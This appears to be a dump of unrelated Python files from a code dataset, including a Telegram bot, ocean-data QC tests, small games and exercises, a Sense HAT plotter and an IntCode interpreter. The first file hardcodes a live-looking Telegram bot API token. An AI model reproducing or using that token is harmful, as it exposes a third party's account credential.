import TocMachine\n\n\nAPI_TOKEN = '513813287:AAHeRZsswSWMqoK6DwEVS4aa9Cn6bcWAfnI'\nWEBHOOK_URL = 'https://cdc9dd7a.ngrok.io/hook'\n\napp = Flask(__name__)\nbot = telegram.Bot(token=API_TOKEN)\nmachine = TocMachine(\n states=[\n 'init',\n 'hello',\n 'name',\n 'reply_name',\n 'recommend',\n 'sport',\n 'movie',\n 'news',\n 'exit'\n ],\n transitions=[\n {\n 'trigger': 'advance',\n 'source': 'init',\n 'dest': 'hello',\n 'conditions': 'say_hi'\n },\n {\n 'trigger': 'advance',\n 'source': 'init',\n 'dest': 'name',\n 'conditions': 'say_name'\n },\n {\n 'trigger': 'advance',\n 'source': 'name',\n 'dest': 'reply_name',\n 'conditions':'reply'\n },\n {\n 'trigger':'advance',\n 'source':'init',\n 'dest':'recommend',\n 'conditions':'choice'\n },\n {\n 'trigger':'advance',\n 'source':'recommend',\n 'dest':'sport',\n 'conditions':'go_sport'\n },\n {\n 'trigger':'advance',\n 'source':'recommend',\n 'dest':'movie',\n 'conditions':'go_movie'\n },\n {\n 'trigger':'advance',\n 'source':'recommend',\n 'dest':'news',\n 'conditions':'go_news'\n },\n {\n 'trigger':'advance',\n 'source':'recommend',\n 'dest':'exit',\n 'conditions':'go_exit'\n },\n {\n 'trigger':'go_back',\n 'source':['hello','reply_name','exit'],\n 'dest':'init'\n },\n {\n 'trigger':'go_recommend',\n 'source':['sport','movie','news'],\n 'dest':'recommend',\n }\n ],\n initial='init',\n auto_transitions=False,\n show_conditions=True,\n)\n\n\ndef _set_webhook():\n status = bot.set_webhook(WEBHOOK_URL)\n if not status:\n print('Webhook setup failed')\n sys.exit(1)\n else:\n print('Your webhook URL has been set to \"{}\"'.format(WEBHOOK_URL))\n\n\n@app.route('/hook', methods=['POST'])\ndef webhook_handler():\n update = telegram.Update.de_json(request.get_json(force=True), bot)\n machine.advance(update)\n return 'ok'\n\n\n@app.route('/show-fsm', methods=['GET'])\ndef show_fsm():\n byte_io = BytesIO()\n machine.graph.draw(byte_io, prog='dot', format='png')\n byte_io.seek(0)\n return send_file(byte_io, attachment_filename='fsm.png', mimetype='image/png')\n\n\nif __name__ == \"__main__\":\n _set_webhook()\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"537526396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Consistency check for location at sea QC test.\n\"\"\"\n\nfrom numpy import ma\n\nfrom cotede.qctests.location_at_sea import (\n LocationAtSea,\n location_at_sea,\n get_bathymetry,\n)\nfrom data import DummyData\n\n\ndef test_bathymetry_point():\n \"\"\"Check the elevation of single locations\n \"\"\"\n coords = [[10, 30, -366], [10, -30, 5192], [15, -38, 5036], [12, 222, 4995]]\n for lat, lon, z in coords:\n etopo = get_bathymetry(lat, lon, resolution=\"5min\")\n\n assert \"bathymetry\" in etopo, \"Missing bathymetry from get_bathymetry\"\n assert ma.allclose(etopo[\"bathymetry\"], [z]), \\\n \"For ({},{}) expected {}\".format(lat, lon, z)\n\n\ndef test_bathymetry_track():\n \"\"\"Check the elevation for a track\n \"\"\"\n lat = [10, 10, 15, 12]\n lon = [30, -30, -38, 222]\n z = [-366, 5192, 5036, 4995]\n etopo = get_bathymetry(lat, lon, resolution=\"5min\")\n\n assert \"bathymetry\" in etopo, \"Missing bathymetry from get_bathymetry\"\n assert ma.allclose(etopo[\"bathymetry\"], z), \"Unexpected value\"\n\n\ndef test_bathymetry_greenwich():\n \"\"\"Check elevation that includes 0\n \"\"\"\n coords = [[0, 0, 4876], [6, 0, -76], [-10, 0, 5454]]\n for lat, lon, z in coords:\n etopo = get_bathymetry(lat, lon, resolution=\"5min\")\n assert \"bathymetry\" in etopo, \"Missing bathymetry from get_bathymetry\"\n assert ma.allclose(etopo[\"bathymetry\"], [z]), \\\n \"For ({},{}) expected {}\".format(lat, lon, z)\n\n\ndef test_attribute():\n data = DummyData()\n\n coords = [[10, -30, 1], [10, 330, 1]]\n for lat, lon, flag in coords:\n data.attrs['LATITUDE'] = lat\n data.attrs['LONGITUDE'] = lon\n assert location_at_sea(data) == flag\n\n\ndef test_attribute_inland():\n data = DummyData()\n\n coords = [[-10, -60, 3], [-10, 300, 3]]\n for lat, lon, flag in coords:\n data.attrs['LATITUDE'] = lat\n data.attrs['LONGITUDE'] = lon\n assert location_at_sea(data) == flag\n\n\ndef notready_test_data():\n data = DummyData()\n\n data.data['LATITUDE'] = 10\n data.data['LONGITUDE'] = -30\n flag = location_at_sea(data)\n assert flag == 1\n\n data.data['LATITUDE'] = 10\n data.data['LONGITUDE'] = 330\n flag = location_at_sea(data)\n assert flag == 1\n\n\ndef test_badlocation():\n data = DummyData()\n\n coords = [[91, -30, 3], [-91, -30, 3], [10, -361, 3], [10, 1000, 3]]\n for lat, lon, flag in coords:\n data.attrs['LATITUDE'] = lat\n data.attrs['LONGITUDE'] = lon\n assert location_at_sea(data) == flag\n\n\ndef test_nonelocation():\n data = DummyData()\n\n coords = [[None, 1, 0], [1, None, 0]]\n for lat, lon, flag in coords:\n data.attrs['LATITUDE'] = lat\n data.attrs['LONGITUDE'] = lon\n assert location_at_sea(data) == flag\n\n del(data.attrs['LATITUDE'])\n data.attrs['LONGITUDE'] = 1\n assert location_at_sea(data) == 0\n\n del(data.attrs['LONGITUDE'])\n data.attrs['LATITUDE'] = 1\n assert location_at_sea(data) == 0\n\n\ndef test_LocationAtSea_attrs():\n \"\"\"Test standard with single location\n\n Lat & Lon defined in the attrs\n\n Locking etopo resolution, since it can change the values.\n \"\"\"\n data = DummyData()\n y = LocationAtSea(data, cfg={'resolution': '5min'})\n\n assert hasattr(y, 'features')\n assert 'bathymetry' in y.features\n assert ma.allclose(y.features['bathymetry'], 5036)\n assert hasattr(y, 'flags')\n assert 'location_at_sea' in y.flags\n assert ma.allclose(y.flags['location_at_sea'], 1)\n\n\ndef test_LocationAtSea_track():\n \"\"\"Test standard with multiple locations\n\n lat & lon defined in the dataset. This would be the case for a TSG\n where each measurement is associated with a location.\n\n Locking etopo resolution, since it can change the values.\n\n Note that there is no restriction in the number of locations. In this\n example there are multiple depths but only 3 positions. It's not the\n LocationAtSea job to make sense of that. Should it match with which\n variable? It can't be done here, but should be done once the tests\n are combined.\n \"\"\"\n data = DummyData()\n data.data['LATITUDE'] = [15, 12, 8]\n data.data['LONGITUDE'] = [-38, 222, 0]\n\n y = LocationAtSea(data, cfg={'resolution': '5min'})\n\n assert hasattr(y, 'features')\n assert 'bathymetry' in y.features\n assert ma.allclose(y.features['bathymetry'], [5036, 4995, -122])\n assert hasattr(y, 'flags')\n assert 'location_at_sea' in y.flags\n assert ma.allclose(y.flags['location_at_sea'], [1, 1, 4])\n","sub_path":"tests/qctests/test_qc_location_at_sea.py","file_name":"test_qc_location_at_sea.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"310948994","text":"\"\"\" CircularPrime \"\"\"\ndef prime(num):\n \"\"\" num is prime or not \"\"\"\n for i in range(2, int(num**0.5)+1):\n if num%i == 0:\n return False\n return True if num != 1 else False\n\n\ndef circular(num):\n \"\"\" num is circular or not \"\"\"\n str_num = str(num)\n for i in range(len(str_num)):\n now = int(str_num[i:] + str_num[:i])\n if not prime(now):\n return 0\n return num\n\n\ndef circular_prime(num):\n \"\"\" for i=1 to num, find the sum of circular number \"\"\"\n ans = 0\n for i in range(2, num+1):\n ans += circular(i)\n print(ans)\n\n\ncircular_prime(int(input()))\n","sub_path":"PSIT0161AM/W504_CircularPrime.py","file_name":"W504_CircularPrime.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456148272","text":"import time\r\nimport random\r\n\r\nprint(\"\\n ****************************************BIENVENIDOS AL REINO DEL DRAGÓN*************************************************************** \\n\")\r\n\r\ndef introduccion(jugador):\r\n\tprint(\"\\n \\nEn este juego, el jugador se encuentra en una tierra llena de dragones. Los dragones viven en sus cuevas y en ellas guardan sus tesoros.\")\r\n\tprint(\"Algunos dragones son buenos y compartirán su tesoro, otros dragones son codiciosos y hambrientos y se comerán a cualquiera que pise su cueva.\")\r\n\tprint(\"El jugador se encuentra frente a las dos cuevas, una con un dragón amable y otra con un dragón hambriento.\") \r\n\tprint(\"El jugador tiene que elegir a cual cueva entrar, sin saber de ante mano donde esta uno u el otro. \\n \\n\")\r\n\tjugador=input(\"\tIntroduce tu nombre de jugador: \")\r\n\tprint(\"\\nMuy bien {}. Bienvenido a la tierra de dragones. \\nAnte ti se encuentran dos cuevas de aspecto semejante.\\nTú OBJETIVO es sobrevivir al menos 3 veces seguidas y acumular todo el dinero posible por el camino.\\n\\nSi lo logras, ganarás.\\nDe lo contrario serás devorado por el dragón Abraham!!!\\n\".format(jugador))\r\n\treturn jugador\r\n\r\n\r\n\r\ndef CambiarCueva():\r\n cueva = \"\"\r\n while cueva != \"1\" and cueva != \"2\":\r\n print (\"A que cueva quieres entrar? 1 o 2?\")\r\n cueva =input() \r\n \r\n return cueva\r\n\r\n\r\ndef cheqcueva(CambiarCueva,vivo,dinero):\r\n print (\"\\n\\nTe acercas a la Cueva...\")\r\n time.sleep(2)\r\n print (\"Esta oscuro y huele mal...\")\r\n time.sleep(2)\r\n print (\"Un gran dragon aparece frente a ti...\")\r\n print(\"Abre su boca y...\")\r\n time.sleep(2)\r\n print (\"\")\r\n \r\n eleccionesvitales = random.randint (1, 2)\r\n \r\n if CambiarCueva == str(eleccionesvitales):\r\n print (\"\\nTe entrega el tesoro...\")\r\n \r\n time.sleep(2)\r\n \r\n ganancia=random.randint (500, 2000)\r\n dinero=dinero+ganancia\r\n print(\"El dragón comparte su tesoro contigo.... \\nTienes {} $ ahora mismo\\n\".format(dinero))\r\n time.sleep(2)\r\n print(\"Has sobrevivido a esta ronda.\\n\\nContinuemos.\\n\")\r\n time.sleep(2)\r\n vivo+=1\r\n \r\n return vivo,dinero\r\n\r\n\r\n \r\n else:\r\n print (\"\\nEl dragón te arranca la cabeza de un mordisco....\")\r\n vivo=5\r\n print(\"Vaya,estabas cerca....\\n\")\r\n print(\"\\nFIN DEL JUEGO. Pringado!!!\\n\")\r\n return vivo,dinero\r\n \r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \r\n \r\nnom= \"\"\r\nvivo=0\r\nresult=0\r\ndinero=0\r\ndiner=0\r\nintroduccion(nom)\r\n\r\nwhile result < 3:\r\n\r\n\tNumCaverna = CambiarCueva()\r\n\tresult,diner=cheqcueva(NumCaverna,vivo,dinero)\r\n\tvivo=result\r\n\tdinero=diner\r\n\r\n \r\nif result ==3:\r\n\tprint(\"\\n\\nHAS GANADO EL JUEGO!!!!\\nY HAS ACUMULADO {} $\\n \".format(dinero)) ","sub_path":"REDES RECURRENTES/REDES LSTM/dragon.py","file_name":"dragon.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"399083766","text":"from Ponomarenko_pmi25.programming.programming_6.meetings import Meetings\nfrom Ponomarenko_pmi25.programming.programming_6.validation import *\nfrom Ponomarenko_pmi25.programming.programming_6.memento import Creator, Caretaker\n\n\ndef copy_of_meetings(ls):\n ls1 = Meetings()\n for i in ls.meetings:\n ls1.add_to_list(i)\n return ls1\n\n\ndef memento(ls1: Meetings, originator: Creator, caretaker: Caretaker):\n originator.change(ls1)\n caretaker.filling_stack()\n ls = originator.get_condition_o()\n return ls\n\n\nls = Meetings()\nfile_name = validate_file_input()\nls.fill_list_from_file(file_name)\noriginator = Creator(ls)\ncaretaker = Caretaker(originator)\ncaretaker.filling_stack()\nwhile True:\n number_op = input('''Input number of option:\n 1. Search meetings with value\n 2. Sort by parametr\n 3. Delete meeting by ID\n 4. Add meeting\n 5. Edit meeting by ID\n 6. See all meetings\n 7. Undo\n 8. Redo\n 9. Exit''' + '\\n')\n if number_op == '1':\n val = input('Input value for meeting: ')\n ls.search_in_list(val)\n elif number_op == '2':\n print('''Parametrs to sort: id, date, start_time, end_time, meeting_url, owner, participant''')\n param = input('Input parametr for sorting: ')\n if param in ['id', 'date', 'start_time', 'end_time', 'owner', 'meeting_url', 'participant']:\n ls1 = copy_of_meetings(ls)\n ls1.sort(param)\n ls = memento(ls1, originator, caretaker)\n else:\n print('Wrong parametr')\n elif number_op == '3':\n id = input('Input id: ')\n if id.isdigit() is True:\n ls1 = copy_of_meetings(ls)\n ls1.remove(file_name, id)\n ls = memento(ls1, originator, caretaker)\n else:\n print(\"Wrong id\")\n elif number_op == '4':\n new_meeting = input('Input info for new meeting: ')\n if type(new_meeting) == str:\n ls1 = copy_of_meetings(ls)\n ls1.add(new_meeting, file_name)\n ls = memento(ls1, originator, caretaker)\n elif number_op == '5':\n id = input('Input id: ')\n new_meeting = input('Input info for new meeting: ')\n if type(new_meeting) == str:\n ls1 = copy_of_meetings(ls)\n ls1.edit(new_meeting, file_name, id)\n ls = memento(ls1, originator, caretaker)\n elif number_op == '6':\n if type(ls) == 'NoneType':\n print('Your list_meetings is empty!')\n else:\n ls.print_list()\n elif number_op == '7':\n caretaker.undo_redo('undo')\n ls = originator.get_condition_o()\n ls.rewrite_file(file_name)\n elif number_op == '8':\n caretaker.undo_redo('redo')\n ls = originator.get_condition_o()\n ls.rewrite_file(file_name)\n elif number_op == '9':\n break\n else:\n print('Wrong number of choice')","sub_path":"programming/programming_6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"250433581","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass PendulumAnimation(object):\n def __init__(self, theta=0., time=0., u=0., rod_length=1.):\n self.l = rod_length\n self.fig = plt.figure(figsize=(7., 7.))\n self.ax = self.fig.add_subplot(1, 1, 1)\n d = self.l + 0.25\n self.ax.set_xlim(-d, d)\n self.ax.set_ylim(-d, d)\n x, y, dx, dy, orientation, size = self.update_marker(theta, u)\n self.arrow = self.ax.plot([x, x + dx], [y, y + dy], 'r', marker=(3, 0, orientation), markersize=size)\n self.pendulum = self.ax.plot([0, x], [0, y], 'ko-', lw=2, markersize=18)\n self.time = self.ax.text(-d + 0.05, d - 0.1, f't = {time:.2f} s')\n self.theta = self.ax.text(-d + 0.05, d - 0.175, f'th = {theta * 180 / np.pi:.2f} degrees')\n self.u = self.ax.text(-d + 0.05, d - 0.25, f'u = {u:.2f} N')\n\n def close(self):\n plt.close()\n plt.ioff()\n\n def update_marker(self, theta, u):\n x = -self.l * np.sin(theta)\n y = self.l * np.cos(theta)\n dx = -.1 * u * np.cos(theta)\n dy = -.1 * u * np.sin(theta)\n orientation = theta * 180 / np.pi + np.sign(u) * 90\n size = 10. * np.absolute(u)\n return x, y, dx, dy, orientation, size\n\n def update(self, theta, time, u):\n self.time.set_text(f't = {time:.2f} s')\n self.theta.set_text(f'th = {theta * 180 / np.pi:.2f} degrees')\n self.u.set_text(f'u = {u:.2f} N')\n x, y, dx, dy, orientation, size = self.update_marker(theta, u)\n self.arrow[0].set_data([x, x + dx], [y, y + dy])\n self.arrow[0].set_marker((3, 0, orientation))\n self.arrow[0].set_markersize(size)\n self.pendulum[0].set_data([0, x], [0, y])\n self.fig.canvas.draw()\n\n","sub_path":"papers/ICML20/envs/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"180170701","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n#This program creates graphs with data obtained by the Sense HAT.\n#Created by Iker García.\n\nimport csv\nimport matplotlib\nmatplotlib.use(\"Agg\") #Added to plot graphs without running X server.\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sense_hat import SenseHat\nimport time \n\nwhile True:\n try:\n sense = SenseHat()\n temp = sense.get_temperature() #Reads temperature from Sense HAT.\n hum = sense.get_humidity() #Reads humidity from Sense HAT.\n\n file = open(\"/var/www/dashboard/linetemp.csv\", \"a\") #Opens file to save data.\n writer = csv.writer(file, delimiter = \",\")\n readfile = open(\"/var/www/dashboard/linetemp.csv\", \"r\") #Opens file to count rows.\n reader = csv.reader(readfile, delimiter = \",\")\n log = list(reader)\n rows = len(log) \n measure = 60*rows #Data is going to be added each 60 minutes, we want to reflect this in the data file.\n data = [measure,temp]\n data = [int(i) for i in data] #Transforms data list in int, in order to be read by Matplotlib.\n writer.writerow(data) #Writes data on the csv file.\n\n file2 = open(\"/var/www/dashboard/linehum.csv\", \"a\") #Same as previous part, in this case with humidity.\n writer2 = csv.writer(file2, delimiter = \",\")\n readfile2 = open(\"/var/www/dashboard/linehum.csv\", \"r\")\n reader2 = csv.reader(readfile2, delimiter = \",\")\n log2 = list(reader2)\n rows2 = len(log2)\n measure2 = 60*rows2\n data2 = [measure2, hum]\n data2 = [int(i) for i in data2]\n writer2.writerow(data2)\n\n if rows >= 1 & rows2 >= 1: #Graph can't be plotted with only one data point, so for the first data point (rows = 0), matplotlib is not executed.\n x,y=np.loadtxt(\"/var/www/dashboard/linetemp.csv\", unpack = True, delimiter = \",\") #Opens first data set.\n plt.plot(x,y, label = u\"Temperature (\\u00B0C)\") #Plots first data set.\n x,y2=np.loadtxt(\"/var/www/dashboard/linehum.csv\", unpack = True, delimiter = \",\") #Opens second data set.\n plt.plot(x,y2, label = \"Humidity (%)\") #Plots second data set.\n plt.legend(loc = \"best\") #Plots legend at the best location.\n plt.xlabel(\"Time(min)\") #x axis label.\n plt.savefig(\"/var/www/dashboard/images/lines.png\") #Saves created plot.\n plt.clf() #Clears figure, in order to create a tidy plot.\n time.sleep(3600) #Code is executed each hour.\n else: \n time.sleep(3600) \n\n except KeyboardInterrupt: #Exits program.\n break \n\n","sub_path":"sensehat/DashboardPi/Example1/DashboardPi.py","file_name":"DashboardPi.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"235721756","text":"# Script to copy over BDNYC database sources into SIMPLE\n\nfrom astrodbkit2.astrodb import Database, copy_database_schema\nfrom sqlalchemy import types # for BDNYC column overrides\n\n# Establish connection to databases\n\n# Note that special parameters have to be passed to allow the BDNYC schema work properly\nconnection_string = 'sqlite:///../BDNYCdevdb/bdnycdev.db'\nbdnyc = Database(connection_string,\n reference_tables=['changelog', 'data_requests', 'publications', 'ignore', 'modes',\n 'systems', 'telescopes', 'versions', 'instruments'],\n primary_table='sources',\n primary_table_key='id',\n foreign_key='source_id',\n column_type_overrides={'spectra.spectrum': types.TEXT(),\n 'spectra.local_spectrum': types.TEXT()})\n\n# SIMPLE\nconnection_string = 'sqlite:///SIMPLE.db'\ndb = Database(connection_string)\n\n# Copy first publications that are not already in SIMPLE\ntemp = db.query(db.Publications.c.name).all()\nexisting_simple = [s[0] for s in temp]\ntemp = bdnyc.query(bdnyc.publications)\\\n .filter(db.publications.c.shortname.notin_(existing_simple))\\\n .all()\n\n# Reformat data into something easier for SIMPLE to import\nnew_db_mapping = {'DOI': 'doi', 'shortname': 'name'}\ndata = [{new_db_mapping.get(k, k): x.__getattribute__(k)\n for k in x.keys() if k not in 'id'\n }\n for x in temp]\n\ndb.Publications.insert().execute(data)\n\n# Verify insert and save to disk\ndb.query(db.Publications).count()\ndb.save_db('data')\n","sub_path":"scripts/bdnyc_object_copy.py","file_name":"bdnyc_object_copy.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92791769","text":"#!/usr/bin/env python3\n\nimport argparse\nimport collections\nimport sys\n\n# General day 2 stuff\n\nclass IntCode(object):\n\n INSTR_ZERO= set([99])\n INSTR_ONE = set([3, 4, 9])\n INSTR_TWO = set([5, 6])\n INSTR_THREE= set([1, 2, 7, 8])\n\n def __init__(self, size, io_in, io_out):\n self.memory = [0] * size\n self.relative_offset = 0\n self.program_counter = 0\n self.cycle_counter = 0\n self.steps = -1\n self.io_in = io_in\n self.io_out = io_out\n\n def instr_args(self, instr):\n \"\"\"returns the number of arguments for a given instruction\"\"\"\n if instr in IntCode.INSTR_ZERO:\n return 0\n elif instr in IntCode.INSTR_ONE:\n return 1\n elif instr in IntCode.INSTR_TWO:\n return 2\n elif instr in IntCode.INSTR_THREE:\n return 3\n else:\n raise Exception(\"Illegal instruction: %s\" % str(instr))\n\n def decode_modes(self, instr):\n return ((instr // 10000) % 10,\n (instr // 1000) % 10,\n (instr // 100) % 10,\n (instr % 100))\n\n def exec(self):\n pc = self.program_counter\n pinstr = self.memory[pc]\n # Not all modes may be applicable, they're fetched anyway.\n mode2, mode1, mode0, instr = self.decode_modes(pinstr)\n argc = self.instr_args(instr)\n args = self.memory[pc + 1:pc + 1 + argc]\n \n self.cycle_counter += 1\n # Jumps reset this later.\n self.program_counter += argc + 1\n if instr == 1:\n self.mem(args[2], mode2,\n val=self.mem(args[0], mode0) + self.mem(args[1], mode1))\n elif instr == 2:\n self.mem(args[2], mode2,\n val=self.mem(args[0], mode0) * self.mem(args[1], mode1))\n elif instr == 3:\n self.mem(args[0], mode0, val=self.io_in())\n #raise Exception(\"not implemented\")\n elif instr == 4:\n self.io_out(self.mem(args[0], mode0))\n #raise Exception(\"not implemented\")\n elif instr == 5:\n if self.mem(args[0], mode0) != 0:\n # we increment program counter later.\n self.program_counter = self.mem(args[1], mode1)\n elif instr == 6:\n if self.mem(args[0], mode0) == 0:\n # we increment program counter later.\n self.program_counter = self.mem(args[1], mode1)\n elif instr == 7:\n self.mem(args[2], mode2,\n val=int(self.mem(args[0], mode0) < self.mem(args[1], mode1)))\n elif instr == 8:\n self.mem(args[2], mode2,\n val=int(self.mem(args[0], mode0) == self.mem(args[1], mode1)))\n elif instr == 9:\n self.relative_offset += self.mem(args[0], mode0)\n elif instr == 99:\n return \"exit\"\n else:\n raise Exception(\"invalid instruction: %s at index: \" % (str(instr), self.program_counter))\n return None\n\n def run(self):\n out = None\n while True:\n if out == \"exit\" or self.steps == self.cycle_counter:\n break\n out = self.exec()\n\n def mem(self, arg, mode, *, val=None):\n if mode not in [0, 1, 2]:\n raise Exception(\"bad mode: %s\" % mode)\n if val is not None:\n # data write\n if mode == 0:\n self.memory[arg] = val\n elif mode == 1:\n raise Exception(\"illegal mode for write: %s\" % mode)\n elif mode == 2:\n self.memory[arg + self.relative_offset] = val\n else:\n if mode == 0:\n return self.memory[arg]\n elif mode == 1:\n return arg\n elif mode == 2:\n return self.memory[arg + self.relative_offset]\n\n\n# Add 2 2tuples\ndef ta(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n return (x1 + x2, y1 + y2)\n\n\nclass Grid(object):\n MOVEMENT = [\n (0,1),\n (1,0),\n (0,-1),\n (-1,0),\n ]\n def __init__(self):\n self.grid = collections.defaultdict(lambda: -1)\n\n def dimensions(self):\n if len(self.grid) == 0:\n return (0, 0)\n xs = [ x for x,y in self.grid.keys() ]\n x_min, x_max = min(xs), max(xs)\n ys = [ y for x,y in self.grid.keys() ]\n y_min, y_max = min(ys), max(ys)\n return (x_max - x_min + 1, y_max - y_min + 1)\n\n def keys(self):\n return self.grid.keys()\n\n def __getitem__(self, pos):\n return self.grid[pos]\n\n def __setitem__(self, pos, value):\n self.grid[pos] = value\n\n def __repr__(self):\n if len(self.grid) == 0:\n return \"\"\n # 3 and -1 are special, 3 is used to mark start. -1 for unexplored.\n # visualize the world.\n xs = [ x for x,y in self.grid.keys() ]\n x_min, x_max = min(xs), max(xs)\n ys = [ y for x,y in self.grid.keys() ]\n y_min, y_max = min(ys), max(ys)\n\n out = \"\"\n for y in range(y_min, y_max + 1):\n for x in range(x_min, x_max + 1):\n t = self[(x,y)]\n out += t\n out += \"\\n\"\n\n return out\n\nclass RepairDroid(object):\n def __init__(self, brain_source, world):\n self.brain = IntCode(0, lambda: self.read(), lambda x: self.write(x))\n self.brain.memory = load(brain_source) + [0] * 4096\n self.world = world\n self.x = 0\n self.y = 0\n # index for read\n self.r = -1\n self.last = 0\n\n def run(self):\n self.brain.run()\n\n def read(self):\n \"\"\"\n L,10,L,12,R,6, -> A\n R,10,L,4,L,4,L,12, -> B\n L,10,L,12,R,6, -> A\n R,10,L,4,L,4,L,12, -> B\n L,10,L,12,R,6, -> A\n L,10,R,10,R,6,L,4, -> C\n R,10,L,4,L,4,L,12, -> B\n L,10,R,10,R,6,L,4, -> C\n L,10,L,12,R,6, -> A\n L,10,R,10,R,6,L,4, -> C\n \"\"\"\n data = \"\"\"A,B,A,B,A,C,B,C,A,C\nL,10,L,12,R,6\nR,10,L,4,L,4,L,12\nL,10,R,10,R,6,L,4\nn\n\"\"\"\n self.r += 1\n return ord(data[self.r])\n\n def write(self, val):\n self.last = val\n print(chr(val), end=\"\")\n return\n if val != 10:\n self.world[(self.x, self.y)] = chr(val)\n self.x += 1\n else:\n self.x = 0\n self.y += 1\n\n\ndef load(f):\n contents = []\n for line in f:\n contents.extend(line.split(','))\n return [ int(i) for i in contents ]\n\ndef intersections(w):\n intersections = []\n mx, my = w.dimensions()\n for y in range(my):\n for x in range(mx):\n pos = (x,y)\n if w[pos] != \"#\":\n print(w[pos], end=\"\")\n continue\n is_intersection = True\n for neighbour in [w[ta(pos, n)] for n in Grid.MOVEMENT]:\n if neighbour != \"#\":\n is_intersection = False\n break\n if is_intersection:\n intersections.append(pos)\n print(\"O\", end=\"\")\n else:\n print(w[pos], end=\"\")\n print()\n\n print(\"sum of intersection squares\", sum([x * y for x,y in intersections]))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('program', type=argparse.FileType('r'), nargs='?', default=sys.stdin)\n\n args = parser.parse_args(sys.argv[1:])\n\n w = Grid()\n droid = RepairDroid(args.program, w)\n # Map out the whole station.\n try:\n droid.run()\n print()\n print(\"dust\", droid.last)\n except Exception as e:\n print(e)\n except KeyboardInterrupt:\n pass\n\n # Solve the maze by hand, compress later.\n # Starting facing up.\n\n \"\"\"\n L,10,L,12,R,6,R,10,L,4,L,4,L,12,\n L,10,L,12,R,6,R,10,L,4,L,4,L,12,\n L,10,L,12,R,6,\n L,10,R,10,R,6,L,4,\n R,10,L,4,L,4,L,12,\n L,10,R,10,R,6,L,4,\n L,10,L,12,R,6,\n L,10,R,10,R,6,L4\n \"\"\"\n\n \"\"\"\n L,10,L,12,R,6,\n R,10,L,4,L,4,L,12,\n L,10,L,12,R,6,\n R,10,L,4,L,4,L,12,\n L,10,L,12,R,6,\n L,10,R,10,R,6,L,4,\n R,10,L,4,L,4,L,12,\n L,10 R,10,R,6,L,4,\n L,10,L,12,R,6,\n L,10,R,10,R,6,L4\n \"\"\"\n #print(w)\n #print(\"---\")\n #print()\n\n # Find all the intersection points\n #intersections(w)\n","sub_path":"2019/day-17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"32158213","text":"\n#\n# This source file is part of appleseed.\n# Visit http://appleseedhq.net/ for additional information and resources.\n#\n# This software is released under the MIT license.\n#\n# Copyright (c) 2016-2017 Esteban Tovagliari, The appleseedhq Organization\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\n# Maya imports.\nimport pymel.core as pm\nimport maya.mel as mel\n\n# appleseedMaya imports.\nfrom logger import logger\n\n\ndef hyperShadePanelBuildCreateMenuCallback():\n pm.menuItem(label=\"Appleseed\")\n pm.menuItem(divider=True)\n\ndef hyperShadePanelBuildCreateSubMenuCallback():\n return \"shader/surface\"\n\ndef buildRenderNodeTreeListerContentCallback(tl, postCommand, filterString):\n melCmd = 'addToRenderNodeTreeLister(\"{0}\", \"{1}\", \"{2}\", \"{3}\", \"{4}\", \"{5}\");'.format(\n tl,\n postCommand,\n \"Appleseed/Surface\",\n \"appleseed/surface\",\n \"-asShader\",\n \"\"\n )\n logger.debug(\"buildRenderNodeTreeListerContentCallback: mel = %s\" % melCmd)\n mel.eval(melCmd)\n\n melCmd = 'addToRenderNodeTreeLister(\"{0}\", \"{1}\", \"{2}\", \"{3}\", \"{4}\", \"{5}\");'.format(\n tl,\n postCommand,\n \"Appleseed/Textures\",\n \"appleseed/texture\",\n \"-asUtility\",\n \"\"\n )\n logger.debug(\"buildRenderNodeTreeListerContentCallback: mel = %s\" % melCmd)\n mel.eval(melCmd)\n\ndef 